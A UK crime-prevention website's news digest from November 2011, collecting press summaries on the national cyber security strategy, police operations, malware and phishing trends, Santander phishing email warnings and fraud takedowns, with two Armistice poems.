It comes as the amount - currently about 6% - of UK GDP generated by the internet continues to grow.

The increasing dependence on the digital world carries risks and the cyber security strategy is aimed at outlining responses to minimise them.

Last year's national security strategy ranked hostile computer attacks on a par with international terrorism as a threat to the UK.

Ministers then announced an extra £500m for cyber security, particularly to bolster protection for key infrastructure and defence assets.

The government says there are more than 20,000 malicious emails sent to its networks each month, 1,000 of which are deliberately targeted.

'Kitemarking'
 
The strategy is expected to include a new joint initiative between the public and private sector to exchange crucial information on cyber threats and to manage the response to attacks.

It is also expected to set out ways in which GCHQ can help private companies and improve the wider UK cyber security sector.

There will be further details on the Ministry of Defence's new Defence Cyber Operations Group, and a plan to encourage all police forces to follow the lead of the Metropolitan Police and train cyber specialists.

Individuals will also be given more help to protect themselves, amid a warning from GCHQ that 80% of successful attacks could be thwarted by following simple steps like updating anti-virus software regularly.

The strategy is expected to suggest "kitemarking" for cyber security software to help consumers and businesses avoid "scareware" - software which purports to be helpful but is, in fact, malicious.

Earlier this month, the UK hosted an international cyber security conference, drawing together representatives from 60 nations.

The event came soon after GCHQ warned that cyber attacks on the UK were at "disturbing" levels.

Iain Lobban, the head of GCHQ, told the conference that a "significant" attempt was made to target the computer systems of the Foreign Office and other government departments over the summer.

Baroness Neville-Jones, the prime minister's special representative to business on cyber security, said Russia and China - who both attended the conference - were some of the worst culprits involved in cyber-attacks.

Outlining the national security strategy last October, Foreign Secretary William Hague said businesses and individuals must be aware of the risk of cyber attacks, as well as governments.

He said such attacks could become a major threat to the country's economic welfare and its national infrastructure, such as electricity grids.

(25th November 2011)


 

MET COMMISSIONER LAUNCHES WAR ON CRIME
(BBC News, dated 24th November 2011)
www.bbc.co.uk

Britain's top police officer has launched his "war on crime" as about 4,000 police officers raided homes in a massive one-day crackdown.

Scotland Yard Commissioner Bernard Hogan-Howe was joined by London Mayor Boris Johnson on one of the raids. The pair watched as officers smashed their way into a suspected drugs den in Peckham, south-east London.

At least 278 arrests were made as police raided properties in 32 London boroughs. The Metropolitan Police (Met) conducted 580 operations, searching 264 premises, seizing 39 weapons and closing down 14 drugs houses.

At a raid attended by Mr Hogan-Howe and Mr Johnson, police cautioned a woman in her 50s over possession of cannabis.

'Tackle criminals'
 
Unlike a previous raid he attended, officers stopped the London mayor entering the second-floor property. As he left, he remarked that it "may have been because of a scantily-clad lady" inside.

The Met said there would be a "visible" presence as part of the one-day Operation Hawk, which was aimed at targeting drug dealers, anti-social behaviour and other crimes.

Mr Hogan-Howe said the action was part of his "war on crime" agenda. The operation would "tackle criminals decisively and directly", he said.

Mr Hogan-Howe said: "It's all about responding to local concerns and acting on them to crack down on crime rapidly and effectively. "The idea is that we take our intelligence to a magistrate, ask for a warrant and 'put the doors in' as quickly as possible right across London. "It's a renewed emphasis on Safer Neighbourhoods teams making the most of local intelligence and acting on it."

Operation Hawk comes about a month after the Met carried out a day-long operation targeting uninsured drivers across the capital.

More than 500 cars were seized and 66 people arrested in the operation which involved 1,000 officers.

(25th November 2011)


 

HACKED - ARE YOU NEXT ?
(Metro, dated 22nd November 2011 author James Day)
www.metro.co.uk  [Note 1]

Hackers violated the Pentagon's IT provider and the world's biggest aerospace company this year. But criminals are targeting us too - and children and Facebook will be prime targets for future cyber-crime.

Governments will be on high alert next year as the rise of hacking groups brings an increased threat of cyber-warfare.

Global security experts predict a hacking bonanza, with criminals enjoying a greater choice of targets than ever before. We face three main threats: scams on social-networking sites such as Facebook; targeted attacks, such as those that occurred earlier this year on the Sony PlayStation network and the Pentagon's IT provider and aerospace company, Lockheed Martin; and mobile malware, which infiltrates phone apps or turns your device into a 'bot' that can be controlled by a hacker.

However, the most worrying prediction is the danger to children. M86 Security Labs, based in California, warns child pornographers and kidnappers could be interested in personal photos posted online.

Many digital images are stamped with the GPS co-ordinates of where they were taken, explains Bradley Anstis of M86.

'A lot of people don't realise that, with GPS-enabled devices, your GEO location and GPS co-ordinates can be ripped,' he says. 'If your kids use Facebook to upload a photo of their new bedroom to show friends, an attacker could find the co-ordinates for that address.'

The social media threat should not be underestimated. 'We see more new attacks and more new methods coming through social media than any other channel,' says Anstis.

A new M86 report investigates malicious campaigns on Facebook called 'likejacking', where users are tricked into liking pages linked to malicious or dubious websites. It also claims mobile devices are at increased risk of attack.

'Android is now the most attacked platform,' says Anstis. 'This is no anti-Android thing but its application system is a lot more open to malware. It's very much a Wild West out there in terms of protection and, at the moment, there are only very dubious solutions.

'With the Apple iOS, you have to jump through a lot more hoops, stand on one leg and face the wall before getting your application approved.'

A typical mobile-phone attack is to try and access bank accounts by intercepting text messages sent by banks to their customers.

It's not just individuals who should worry. The rise of hacking groups, such as Anonymous and LulzSec, has increased the risk of organisation and government attacks. 'Hacking groups are all trying to out-do each other and prove who's the best,' says Anstis.

Hacking groups choose their targets for commercial, political or military reasons. Lockheed Martin's attackers, for instance, may have been able to steal fighter jet blueprints.

Anstis says the distinction between cyber-crime and cyber-warfare is becoming blurred. 'Targeted attacks are only a small step from cyber-warfare and cyber-warfare is controlled by countries,' he says.

'With cyber-criminals, there is nothing to stop them from taking another step forward alone and saying: "Hey, why don't we try and overheat some nuclear reactors?" It's scary stuff.'

Even next year's Olympic Games is at risk from hackers. Anstis warns criminals may try ticketing, travel and merchandise scams. Sports fans should be on the lookout for spoof emails that look like they're from legitimate organisations.

'This can be accomplished by publishing a section on its website or a fraud-watch line where suspicious activity can be reported,' says Anstis, who admits Olympic organisers can warn people of the risk. 'There is a real opportunity for London to set a precedent for future events like this.'

(25th November 2011)




NEW TOOL LAUNCHED IN FIGHT AGAINST ANTI-SOCIAL BEHAVIOUR
(Surrey Police, dated 15th November 2011)
www.surrey.police.uk

 

Surrey Police officers in Surrey Heath are trialling a new internet-based CCTV camera in their continued fight against anti-social behaviour in the borough.

Just weeks after it was launched, the new Community Monitored TV (CMTV) system, provided by Jabbakam, is already helping to save time and money in investigating allegations of anti-social behaviour. Real-time images, historical searches and remote control of the camera's position can be accessed any time from any computer, which makes it much more user friendly than traditional CCTV cameras.

Surrey Heath Crime Prevention and Design Advisor John Eldridge has been working on the project in conjunction with local Housing Association Accent Peerless.

He said: "Anti-social behaviour still remains a top priority for residents in Surrey Heath. This new system is fully secure, with the recordings held on the supplier's server. Instead of taking hours to download footage, we can simply log on and gain instant access to the images we want. In one instance, we received a Section 5 public order report and within hours we were able to prove that the allegation was false - saving the investigating officer valuable time."

Mr Eldridge added: "It is already working well so far, with footage already being used for evidence to aid police investigations and resolve crimes. The benefits of this kind of technology for the police and the wider community are endless."

Surrey Police has one camera currently deployed with two more on order and the possibility for a fourth currently under discussion.

(21st November 2011)


 

BOLTON TAKES NATIONWIDE LEAD IN FIGHT AGAINST PUB TROUBLEMAKERS
(Greater Manchester Police, dated 14th November 2011)
www.gmp.police.uk

Bolton has become the first area nationwide to adopt a digital only approach to tackling crime and antisocial behaviour in pubs and clubs.

The borough is the first area in the United Kingdom to adopt a system whereby Pubwatch members do all of their communicating and sharing images of banned individuals online.

The purpose of the move is to improve efficiency of Pubwatch schemes and reduce the operational cost of running them.

Members of the schemes sign up to Pubwatch Online* and are given access to shared pages, which include latest news and information on legislation and individuals banned from other premises. If a person causes trouble in one pub and is banned, he will automatically be banned from all other premises in that Pubwatch scheme.

GMP's Divisional Watch Scheme Officer for Bolton, Mary Harrison said: "Licensees in Bolton work very closely with the police and are committed to ensuring safe and well run venues for everyone to enjoy that are free from crime and disorder.

"Having all of the schemes linked electronically will help us to overcome communication problems and high costs of distributing offender photographs and information across the area.

"We can now provide licensees with faster and easier access to up to date information to help make Bolton's pubs and clubs safer places to work and visit."

Brendan Derham, Chairperson of Westhoughton Pub Watch Licensees Alliance, said: "I am fully supportive of Pub Watch Online. I find it to be an effective tool for licensees to combat crime and disorder and contributes to keeping licensed premises a safe environment for the public."

Frank Marnell of National Pubwatch said: "The use of the Internet to share information is a logical step forward for Pubwatch schemes. The ability to quickly distribute information about banned individuals greatly assists licensees in making the scheme effective with the primary aim of safeguarding the safety of licensed premises customers and staff.

"Digital sharing has proven to be very effective for Pub Watch schemes and the Bolton area is a good example of this."

(21st November 2011)


 

SEX CRIMES INCREASE ON LONDON TRANSPORT
(BBC News, dated 17th November 2011)
www.bbc.co.uk
Crime on London's transport network has decreased according to figures released by Transport for London (TfL), but there was a rise in sexual offences.

The statistics showed a 7.9% reduction in crime for the period from April to September, compared with last year.

But sexual offences increased by 15.7% on the Underground and Docklands Light Railway (DLR) and by 8.8% on the capital's buses.

Robberies have increased on buses, and thefts rose on the Underground and DLR.

But the figures compiled by TfL, the Metropolitan Police and British Transport Police showed there were 1,122 fewer offences on buses over the first six months of this financial year compared with the same period last year - a 9.4% drop.

There were also fewer cases of violence and criminal damage.

Crime on the Tube and DLR fell by 272 offences, a 4.1% drop.

'Low-crime environment'
 
Overall, crime fell from 11.4 crimes per million passenger journeys to 10.5.

London Mayor Boris Johnson said he was pleased the measures put in place over the past three years seemed to be paying off. But the police dealt with more sex crimes than last year.

There were an additional 25 sexual offences on the Underground and DLR and 20 more on the bus network.

Robberies also went up on buses, an increase of 233 or 19.8%. On the Tube and DLR there were six fewer robberies, a decrease of 8.7%, but theft of passenger property rose by 237 cases, an increase of 8%.

Steve Burton, TfL's director of community safety, enforcement and policing, said that while the figures showed overall the network was a low-crime environment, there was no room for complacency.

"Within the next six months we are deploying an additional 413 warranted police officers in the Safer Transport Command to provide Londoners with the safe network they expect," he said.

TfL added that despite increases in certain offences, the numbers were low in the context of the billions of journeys made on the system each year.

Further information

TfL crime figures : http://www.tfl.gov.uk/corporate/about-tfl/19385.aspx

(21st November 2011)


 

ARMISTICE

FOR THE FALLEN
Laurence Binyon (1869-1943)

With proud thanksgiving, a mother for her children,
England mourns for her dead across the sea.
Flesh of her flesh they were, spirit of her spirit,
Fallen in the cause of the free.

Solemn the drums thrill; Death august and royal
Sings sorrow up into immortal spheres,
There is music in the midst of desolation
And a glory that shines upon our tears.

They went with songs to the battle, they were young,
Straight of limb, true of eye, steady and aglow.
They were staunch to the end against odds uncounted;
They fell with their faces to the foe.

They shall grow not old, as we that are left grow old:
Age shall not weary them, nor the years contemn.
At the going down of the sun and in the morning
We will remember them.

They mingle not with their laughing comrades again;
They sit no more at familiar tables of home;
They have no lot in our labour of the day-time;
They sleep beyond England's foam.

But where our desires are and our hopes profound,
Felt as a well-spring that is hidden from sight,
To the innermost heart of their own land they are known
As the stars are known to the Night;

As the stars that shall be bright when we are dust,
Moving in marches upon the heavenly plain;
As the stars that are starry in the time of our darkness,
To the end, to the end, they remain.


 

DO NOT STAND AT MY GRAVE AND WEEP
Mary Frye (1905-2004)

Do not stand at my grave and weep,
I am not there, I do not sleep.
I am in a thousand winds that blow,
I am the softly falling snow.
I am the gentle showers of rain,
I am the fields of ripening grain.
I am in the morning hush,
I am in the graceful rush
Of beautiful birds in circling flight,
I am the starshine of the night.
I am in the flowers that bloom,
I am in a quiet room.
I am in the birds that sing,
I am in each lovely thing.
Do not stand at my grave and cry,
I am not there. I do not die.

(11th November 2011)


 

WHATS NEW IN COMPUTER SECURITY - OCTOBER

All the links under this heading are [Note 1]

The following is a group of article summaries on what is happening around the World when it comes to computer security. One way or another at least one of them will affect you.

MASSIVE SWEDISH HACKS LEAK DETAILS ON 400,000 USER ACCOUNTS
(Computer World, dated 27th October 2011 author Mikael Ricknäs)

Full Article : http://cwonline.computerworld.com/t/7667302/930454165/537572/0/


The details of more than 400,000 user accounts have leaked onto the Internet in Sweden, following a series of attacks that have affected about 60 websites.

The hacking scandal started to get attention Tuesday, when a Twitter account belonging to Swedish politician William Petzäll was used to publish passwords to email accounts belonging to some prominent journalists. Petzäll, who is currently undergoing treatment for addiction, denied that he had anything to do with it, and said that his Twitter account had been hijacked. The account was subsequently closed.

The source of the passwords turned out to be blogging site Bloggtoppen.se, which was vulnerable to an SQL injection attack. Its user database, which included details for approximately 94,000 accounts, was published back in September on a site called Flashback, and then distributed via Twitter, as well.

Users repeatedly using the same password makes matters worse


 

FRAUDSTERS FIND CREATIVE WAYS TO ABUSE E-COMMERCE SITES
(Computer World, dated 24th October 2011 author Jeremy Kirk)

Full Article : http://cwonline.computerworld.com/t/7659985/930454165/536483/0/

Even if your company website is secured with the latest software patches and has been tested by ethical hackers, it doesn't mean the scammers will stay away.

In fact, fraudsters are actually highly adaptable, looking for ways to exploit marketing campaigns or incentive programs. They often find ways to abuse a system that weren't considered by either fraud or security specialists, said Laura Mather, founder and chief strategy officer of Silver Tail Systems (a company whose software looks for odd behavior during transactions on e-commerce and banking sites).

Take the company that ran a marketing incentive program offering $5 to people who referred their friends to sign up for an account. The company, which gave away a total of $8 million, gave $2 million of that to just one person in Eastern Europe, Mather said.


 

BREACH REPORTING : NOW COMPANIES IN THE US HAVE TO DO IT
(Computer World, dated 17th October 2011 author Scott Bradner)

Full Article : http://cwonline.computerworld.com/t/7645440/930454165/535629/0/


Consumer advocates as well as many business groups have attempted to get federal laws adopted in the United States that would mandate disclosure of security breaches in which some types of private information about identifiable people are exposed. In spite of the obvious logic of having a national standard, these efforts so far have failed.

But a recent action by the Securities and Exchange Commission may have created a disclosure requirement more sweeping than any of the legislative proponents could have wished for.



SPYEYE MALWARE CONTINUES TO PLAGUE COMPUTERS
(Computer World, dated 14th October 2011 author Jeremy Kirk)

 

Full Article : http://cwonline.computerworld.com/t/7642164/930454165/535418/0/

The SpyEye banking malware continues to plague computers across the world and is proving to be a difficult foe to detect and remove from infected Windows PCs, according to two researchers from EMC's RSA security division.

SpyEye has been around for more than a year and is the successor to the Zeus banking malware. SpyEye emerged after the author of Zeus, who went by the screen name "Slavik," stopped developing it. But another person by the name "Harderman" took over the project, Rivner said.

SpyEye is a kit that is sold to other online criminals. It's easy to use, and people need a high level of technical skills to conduct an attack.


 

CYBERCRIME GETTING EASIER TO COMMIT, FEDS SAY
(Computer World, dated 7th October 2011 author Nancy Gohring)

Full Article : http://cwonline.computerworld.com/t/7627740/930454165/534486/0/

Committing cybercrime these days is as easy as building a fantasy football team, FBI and Secret Service agents said on Friday.

"I'm concerned that the cyber-underground is a beautiful business model. It's like going to eBay or Amazon. You just pick what you need -- coders, mules -- and build a dream team. It's like fantasy football," said Gordon Snow, assistant director in the U.S. Federal Bureau of Investigation's cybercrime division.


 

111 ARRESTED IN MASSIVE ID THEFT BUST
(Computer World, dated 7th October 2011 author Robert McMillan)

Full Article : http://cwonline.computerworld.com/t/7627740/930454165/534484/0/

Prosecutors call it the biggest identity theft bust in U.S. history. On Friday, 111 bank tellers, retail workers, waiters and alleged criminals were charged with running a credit-card-stealing organization that stole more than $13 million in less than a year-and-a-half.

The credit card numbers came from far and wide: from skimming operations in the U.S., where restaurant employees or retail cashiers were paid to steal credit card data from customers; from carder forums on the Internet; and also from shady overseas suppliers in countries such as Russia, China and Libya.


 

FAILING A SECURITY AUDIT ALREADY - ITS GOOD FOR YOU
(Computer World, dated 4th October 2011 author Andreas M Antonopoulos)

Full article : http://cwonline.computerworld.com/t/7619526/930454165/533927/0/

Failing an audit sounds like the last thing any company wants to happen. But that's because audits are seen by many as the goal of a security program. In reality, audits are only the means of testing whether enforcement of security matches the policies. In the broader context, though, an audit is a means to avoid a breach by learning the lesson in a "friendly" exercise rather than in the real world. If the audit is a stress-test of your environment that helps you find the weaknesses before a real attack, you should be failing audit every now and then. After all, if you're not failing any audits there are two possible explanations:

1) You have perfect security.

2) You're not trying hard enough.


 

SCAMMERS PRETEND TO BE FRIENDLY OFFICE PRINTERS
(Computer World, dated 27th September 2011 author Jeremy Kirk)

Full article : http://cwonline.computerworld.com/t/7604242/930454165/532621/0/


Hackers have found a new hook to trick people into opening malicious attachments: send emails that purport to come from office printers, many of which now have the ability to email scanned documents.

"This is a new tactic we haven't really seen before," said Paul Wood, senior intelligence analyst for Symantec.cloud, the company's Web-based security and email branch.

The emails invariably contain some kind of Trojan downloader, which can be used to download other malware or steal documents from the computer.

Symantec published examples of the emails collected recently in its latest monthly Symantec Intelligence Report, released on Tuesday. The emails at first glance look quite convincing, with a subject line "Fwd: Scan from a HP Officejet." The email reads "Attached document was scanned and sent to you using a Hewlett-Packard HP Officejet 05701J" and then "Sent by Morton."

Wood said it is common for the scammers to spoof the sender's name and make it appear the email came from the same domain as the one that belongs to the recipient. Some of the messages captured by Symantec appear to be at a cursory glance internal company email, which makes it more likely that the person who receives the message will open the attachment.


 

NEW MAC MALWARE POSES AS PDF DOC
(Computer World, dated 23rd September 2011 author Gregg Keizer)

Full article : http://cwonline.computerworld.com/t/7597510/930454165/532213/0/

Security firms today warned Mac users of a new Trojan horse that masquerades as a PDF document.

The malware, which was spotted by U.K.-based Sophos and Finnish antivirus vendor F-Secure, uses a technique long practiced by Windows attackers.

"This malware may be attempting to copy the technique implemented by Windows malware, which opens a PDF file containing a '.pdf.exe' extension and an accompanying PDF icon," said F-Secure today.

That practice relies on what is called the "double extension" trick: adding the characters ".pdf" to the filename to disguise an executable file.

The Mac malware uses a two-step process, composed of a Trojan "dropper" utility that downloads a second element, a Trojan "backdoor" that then connects to a remote server controlled by the attacker, using that communications channel to send information gleaned from the infected Mac and receiving additional instructions from the hacker.


 

CYBER RISK AND THE FUTURE OF THE UNITED STATES
(Computer World, dated 22nd September 2011 author Michael Assante)

Full article : http://cwonline.computerworld.com/t/7592529/930454165/532068/0/

In September 2007, in a remote laboratory in Idaho, researchers working on a project dubbed "Aurora" demonstrated the ability of a cyber hacker to destroy physical equipment -- in this case a generator used to create electricity for the power grid. The Aurora research brought the question of physical safety and the ability for a nation to defend itself from attack in the cyber world to the forefront. For the next three years, this difficult discussion would largely remain just a discussion, contemplated, if passionately, in corners of Washington and at wonk-ish meetings across the U.S.


 

3000 US INTELLIGENCE OFFICIALS NAMES, EMAILS LEAKED
(Computer World, dated 19th September 2011)

Full article : http://cwonline.computerworld.com/t/7584039/930454165/531595/0/


Last week, a "premier intelligence and national security organization" was hacked and then hundreds of intelligence officials, ranging from the NSA, FBI, CIA, the Pentagon, the White House, had their names, email addresses, some phone numbers and even home addresses posted on Cryptome.

Intelligence and National Security Alliance (INSA) published a Cyber Intelligence report [PDF] about the need to develop better cyber intelligence sharing, analysis and defenses against the "cyber threat environment" where hackers are cracking into everyone's systems, from government agencies to private companies. 48 hours later, a cyberattack was launched against INSA website and the membership list was leaked after the hack.

MSNBC reported that "in apparent retaliation, INSA's 'secure' computer system was hacked and the entire 3,000-person membership posted on the Cryptome.org." There were 95 email addresses belonging to the "supersecret National Security Agency, as well as scores of others in key positions at the White House, the Pentagon, FBI, CIA, the Office of Director of National Intelligence and the State Department." John Young who runs Cryptome said in a telephone interview with NBC that he had no reservations about publishing 'INSA Nest of Official and Corporate Spies.' Young said, "We would love to name every spy that lives on Earth."


 

HACKERS HIT JAPANS BIGGEST DEFENSE CONTRACTOR
(Computer World, dated 19th September author Gregg Keizer)

Full article : http://cwonline.computerworld.com/t/7584039/930454165/531594/0/
Follow-up article : http://cwonline.computerworld.com/t/7585799/930454165/531747/0/


Japan's largest defense contractor, Mitsubishi Heavy Industries, today acknowledged that scores of its servers and PCs had been infected with malware, but denied that any confidential information had been stolen.

The Daily Yomiuri, citing confidential sources, first reported the attack, which involved as many as eight different types of malware, including Trojan horses.

A U.S.-based Mitsubishi spokesman confirmed that the company had uncovered a large-scale intrusion that had planted malware on 45 servers and an additional 38 individual PCs in several locations around Japan.

Servers at Mitsubishi's Kobe shipyards, where the company builds diesel-electric submarines and components for nuclear power plants; at the company's Nagasaki shipyards; and at its Nagoya plant, which designs and manufactures missile guidance systems, were among those compromised, the spokesman said.

Mitsubishi Heavy's corporate headquarters in Yokohama was also affected by the infection.

(11th November 2011)


 

MORE NEWS FROM MY SPAM INBOX- NOVEMBER (Special) !
Category : phishing
 
My Internet Service Provider's (ISP) spam filter appears to have again done a very good job so far this month. It appears that the phishers have become a little myopic so far this month and have chosen to pick on the customers of only one bank. Six bogus e-mails phishing Santander accounts received in the same number of days, hence this early warning.

- From Santander UK, titled "Reinstate your account" (3 x emails): A slight error occurred during our security update. Someone has made suspicious attempts to log into your account, etc. Proceed to (bogus link provided) to confirm your details.

- From Santander Online, titled "Verify your Account" : Please update your Santander Online Banking account information. It's easy, click on the bogus link below.

- From Santander UK, titled "New changes to your Santander accounts" : Your Santander account could have been violated. Someone with IP address xx.xxx.xx.xxx tried to access your personal account. Please click on the bogus link below and enter your account information.

- From Santander UK, titled "Reinstate Your Santander Account(s)" : An error was detected in your Santander online banking account during our security update today. We've recently noticed that someone has made suspicious attempts to log into your online account. Therefore our security commitment forces us to block your account temporarily until you verify your identity on our systems. Proceed to (bogus link provided) to confirm your details.

These e-mails are bogus and are just phishing for personal information. If you receive anything like them, delete it immediately and do not open any attachments. If you are suspicious about activity on your bank account, contact your bank direct using a known telephone number, NOT contact details within the bogus e-mails.

(10th November 2011)


 

GET SAFE ONLINE WEEK LAUNCHED
(SOCA, dated 7th November 2011)
www.soca.gov.uk/

The increase in smart phone malware is one of the key threats being highlighted during this year's annual Get Safe Online Week. At a Summit to launch the week, Francis Maude, Minister for Cyber Security, introduced a new Rough Guide to Online Safety.

Minister for the Cabinet Office, The Rt Hon Francis Maude MP, comments: "More and more people are using their smart phone to transmit personal and financial information over the internet, whether it's for online banking, shopping or social networking.

"This latest research from Get Safe Online shows that 17 per cent of smart phone users now use their phone for money matters and this doesn't escape the notice of criminals. So while accessing the web via a mobile device can be fun and save time, it's important to be vigilant.

"This week, we are encouraging everyone to take a few moments to visit www.getsafeonline.org and make sure they follow the right advice for using mobile devices securely and safely."

Some smart phone users are getting a nasty surprise when they see their monthly bills, discovering that they have run up huge phone bills for premium-rate text messages they did not send.

This is one of the latest scams being used by online criminals to profit from the recent boom in smart phones and mobile web applications (apps), experts at GetSafeOnline.org are warning today.

Fraudsters are using online app stores to entice smart phone users to download rogue apps. Often masquerading as 'free levels' to popular and legitimate online games, or even as security tools, these rogue apps disguise malicious software (malware) which the user unwittingly downloads at the same time.

Once downloaded, this malware enables fraudsters to take control of the victim's phone, allowing them to make calls, send and intercept SMS and voicemail messages, and browse and download online content. This enables them to gain access to all personal and payment data available on the phone - which can then be sold on to and used by identity fraudsters - and to 'spam' other mobile web users to commit further fraud.

For information and advice on how to guard against online fraud and other internet crime or to download the Rough Guide to Online Safety, visit the Get Safe Online website at www.getsafeonline.org. Online fraud should be reported to Action Fraud www.actionfraud.org.uk.

(9th November 2011)


 

CARD SKIMMING PREVENTION VIDEO LAUNCHED
(Northern Constabulary, dated 7th November 2011)
www.northern.police.uk/

Northern Constabulary have produced a short video aimed at protecting the public from becoming victims of card skimming.

The informative seven-minute film, featuring Inverness Community Safety officer PC Euan McGibbon and chair of Crimestoppers for Highlands and Islands Jim Ferguson, is available on the Northern Constabulary website and on the Force's Facebook and Twitter channels.

The film provides people with an easy to remember acronym (C.H.I.P.) which Police hope the public will bear in mind when using ATMs.

C is for check the machine.

H advises you to hide your pin.

I means inform the Police and the bank and

P means put your money/cash away.

By following this advice you can greatly reduce the chances of becoming a victim of this crime.

Teams of organised criminals have in the past targeted ATM users by stealing their bank card details and PIN numbers with sophisticated card-skimming devices and cameras.

The film shows the public what to look out for and goes into details about how these machines work.

The Force has already had success in relation to this type of crime. On 9 August 2011, two men were jailed at Inverness Sheriff Court as a result of their involvement in card skimming at ATMs in the Inverness area in March of this year.

This was a result of extensive enquiry by Northern Constabulary. Those convicted were part of a wider, organised criminal network and continued vigilance by both the police and members of the public is required.

The film provides useful advice so that members of the public know more about this type of crime and can be better informed when they use ATMs.

To see the 7 minute video click to go to the Northern Constabulary's "Scams" webpage :

www.northern.police.uk/scams.htm

(9th November 2011)




ALLEGED MEMBERS OF A GANG WHO TRAFFICKED PEOPLE INTO UK ARE BAILED
(Courtesy of: Metropolitan Police, dated 3rd November 2011)
www.met.police.uk

 

A Polish gang who trafficked more than 200 people to the UK as part of a multi-million pound benefit fraud has been smashed following a joint investigation by the Metropolitan Police, Her Majesty's Revenue and Customs (HMRC) and the Polish police.

The two-year operation, initiated by the Posen Appeals Prosecution Office (in Poland), culminated on 2 November in 29 people being arrested in Poland and five addresses searched in London, resulting in two arrests (a man and woman aged in their 40s). Searches were also carried out in Birmingham.

The two arrested in London - both Polish nationals - are now bailed to return to a south London police station on 12 December pending further inquiries.

Inquiries found the gang, based in Poland, promised at least 230 victims - many of whom had alcohol or mental health problems - work in the UK.

They then brought the victims to stay in various addresses in this country and tricked them into signing papers to open bank accounts.

The criminals then fraudulently applied for Tax Credit and other benefits using the victims' details and got the money paid into the newly created accounts.

The money was emptied from the accounts by gang members and sent back to the ringleaders in Poland while the trafficked victims were left destitute.

It is believed the scam has cost the UK more than £2million.

Uniformed Polish police officers joined officers from the Human Exploitation and Organised Crime Command (SCD9), Territorial Support Group (TSG) and local officers to search addresses in south and east London for further evidence.

The search warrants coincided with police back in Poland arresting suspected members of the gang as they gathered for a wedding.

Det Insp Kevin Hyland, from SCD9, said: "These vulnerable victims were trafficked here to be exploited and satisfy the greed of these criminals. They were brought here under the impression they were getting a job but were left with nothing, with many ending up on the street.

"The complex international dimension to this inquiry meant that it was vital to have a close relationship with the Polish authorities, which is why they joined us on this operation this week.

"These arrests are the first step in these victims getting justice in their home country and have prevented more money being stolen from the public purse."

Assistant Director John Pointing, from HMRC Criminal Investigation London, said: "During this operation, HMRC investigated over 230 Tax Credit awards with a value in excess of £2,000,000. We suspect the claims have been submitted by a criminal gang trafficking people who have then acquired their victims' identities to commit fraud in the UK.

"The evidence HMRC gathered has played a vital role in the strategic planning of this international investigation and has directly supported the arrest of suspects in Poland and the UK.

"Tax Credits are designed to help lower income families and individuals. HMRC treats criminal attacks on all its systems very seriously and works constantly with our law enforcement partners, here and abroad, to detect, investigate and prosecute offenders."

Police Major Monika Sokolowska from the Central Unit for Trafficking in Human Beings, in Poland, said "This form of trafficking is a new phenomenon in Poland at this present moment. In the past we were used to dealing with cases where people were trafficked for prostitution or for slavery but this new form of trafficking is becoming ever more prevalent.

"This is a big case for us with over 200 statements taken from vulnerable witnesses who were exploited. These people were trafficked to the UK by criminals and did not receive any of the social benefits that were fraudulently claimed in their name.

"This has been an ongoing case working with officers from the MPS and other partner agencies, and much has been achieved today because of the partnership work involved."

Most of the victims are now back in Poland and have been supported by the Polish authorities.

(9th November 2011)


 

BORDER SCREENING RESULTS IN TEN THOUSAND ARRESTS
(Home Office, dated 3rd November 2011)
www.homeoffice.gov.uk 

Ten thousand wanted criminals have been arrested at the border as a result of e-Borders, an advance passenger screening programme.

E-Borders is a system by which air carriers and operators of vessels submit passenger and crew details electronically prior to travel from and to the UK.

There are now an average of 52 arrests per week at ports and airports across the country for a range of crimes, immigration and customs offences as a result of the screening system which was introduced in 2005.

381 million passengers have been processed through the system since 2005, which has resulted in over 10,000 arrests for murder and rape, seizures of Class A drugs, and the refusal of entry to the UK for immigration offenders and overstayers.

Immigration Minister Damian Green said: "The government is doing more than ever before to protect the UK's border. By checking passenger and crew information before travel, law enforcement agencies can apprehend those trying to evade justice.

"From 2013 the new dedicated Border Policing Command, part of the National Crime Agency, will further strengthen security at the border, providing leadership and coordination based on a single national threat assessment and strategy."

How It Works

122 carriers on over 3,000 routes provide passenger data to e-Borders. The UK's National Border Targeting Centre screens the passenger and crew data and generates alerts as a result of intelligence and targeting.

The suspects wanted by the UK Border Agency, police, the Serious Organised Crime Agency (SOCA) and HM Revenue & Customs can then be apprehended before entering or departing the country.

About E-Borders :

www.ukba.homeoffice.gov.uk/customs-travel/beforetravel/advanceinfopassengers/

(9th November 2011)


 

ONLINE FRAUD CAMPAIGN SAVES MILLIONS
(City of London Police, dated 31st October 2011)
www.cityoflondon.police.uk

A major National Fraud Intelligence Bureau (NFIB) campaign to shut down the websites, email addresses and telephone numbers fuelling much of today's fraud has already stopped at least £7 million being lost to fraudsters in the last 2 months.

During September and October the NFIB has suspended 12 websites, 179 telephone numbers and 155 email accounts, which were enabling organised crime gangs to target and steal from individuals and the public and private sector.

The threat of personal information being stolen through phishing e-mails is now being tackled in partnership with UK Payments Administration (UKPA). 978 emails have been passed to the UKPA-run www.banksafeonline.org.uk, for suspension.

NFIB analysis has shown how fraudsters can be resilient, with the ability to quickly reinvent their criminal operation.

Re-creation of websites

In recent months the NFIB has identified fraudsters who are reproducing suspended websites with a similar sounding name and/or signing up for new phone numbers with a different provider. The public is told this has been done for 'technical reasons'.

The NFIB has moved quickly to block this new line of attack.

People who visit certain suspended websites are now being automatically redirected to an alert page on the NFIB website. This provides users with a fraud warning and directs people who believe they have been a victim of fraud to Action Fraud. For legal reasons some ISPs have not been able to comply with the redirection but overall the system is making a positive impact.

Visit www.saltzmankramer.com to see how the NFIB is unmasking the criminal practices of online fraudsters.

The NFIB is taking a similar approach with phone numbers. Once a number is identified as part of a fraudulent operation, the NFIB looks to suspend the line and leave a message to callers explaining exactly why, along with details on how to contact Action Fraud. The aim is to stop the same victim being repeatedly conned and to protect any new, prospective victims.

(9th November 2011)


 

FORCES VITAL STATISTICS MADE PUBLIC
(Police Oracle, dated 28th October author Cliff Caswell)
www.policeoracle.com  [Note 1]

Policing professionals have welcomed a new tool from Her Majesty's Inspectorate of Constabulary that enables the public to see vital force statistics across England and Wales.

The Inspectorate's new online Crime and Policing Comparator gives the public the opportunity to compare crime, quality of service and cost and workforce data through the NPIA-managed http://www.police.uk site. And professionals believe it holds great promise.

The online tool - which can also be accessed via http://www.hmic.gov.uk - is designed to support the government agenda of improving accountability and brings together data from all 43 forces for the past three years.

By clicking on http://www.police.uk, users are presented with a box from HMIC showing crime trends over time plus a link to the new Comparator. The tool provides a raw data file readable by a spreadsheet programme.

Sir Denis O'Connor, HM Chief Inspector of Constabulary said that the data would give members of the public a comprehensive picture of policing.

